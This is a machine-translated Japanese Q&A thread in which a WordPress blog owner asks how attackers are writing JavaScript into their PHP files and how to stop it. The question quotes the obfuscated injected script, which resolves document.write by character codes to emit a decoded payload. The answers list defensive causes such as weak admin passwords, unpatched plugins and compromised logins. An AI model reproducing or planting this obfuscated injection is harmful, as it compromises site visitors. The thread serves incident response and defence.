web-dev-qa-db-ja.com

攻撃者はどこのように私のphpファイルにスクリプトを書くのですか?

私はwordpressで作成されたブログを持っています、今私は問題を抱えています。攻撃者は私のファイルにJavaScriptコードを書き込みます。

プラグインスクリプトに穴が開いているとしましょう。しかし、どうすればphpファイルに書き込むことができるでしょうか。

ここにphpファイルのリストの一部があり、そこにスクリプトが書かれています(index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ...)。

これが彼らが書いているJavaScriptです。

<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>

どうすればこのような攻撃を防ぐことができますか?

私はwordpressの経験がないので、どんな助けでもとても素敵になるでしょう。

どうもありがとう

4
Syom

こんにちは@ Syom:

管理者に "admin"という名前を使い、パスワードをハックするのが簡単なので、ハッカーがアクセスすることがよくあります。あるいは、あなたがあなたのソフトウェアを更新しておらず、発見されパッチされたセキュリティホールのいくつかを利用しているからです。

先週末にWordCamp Phoenixで発表されたWordPressサイトを保護する方法を説明する一連のスライドがあります。

この件に関するOttoのブログ記事は次のとおりです。

5
MikeSchinkel

可能な方法は複数あります。

  • 侵害されたFTP/SSHログイン
  • 侵害されたWordPressログイン。
  • サーバーセキュリティ設定の誤り。
  • 侵害されたサーバー
  • ある種のバックドアがインストールされています。
  • 等.

あなたはすぐにホスティングサポートに連絡するべきです、そしてそれはあなたがホスティングの質と価格にどれだけ彼らが助けるだろうかによります。

それ以外にあなたが技術的なスキルに自信がないならば、私は専門的にハッキングされたブログのクリーンアップを扱う誰かを探すことを提案します。

1
Rarst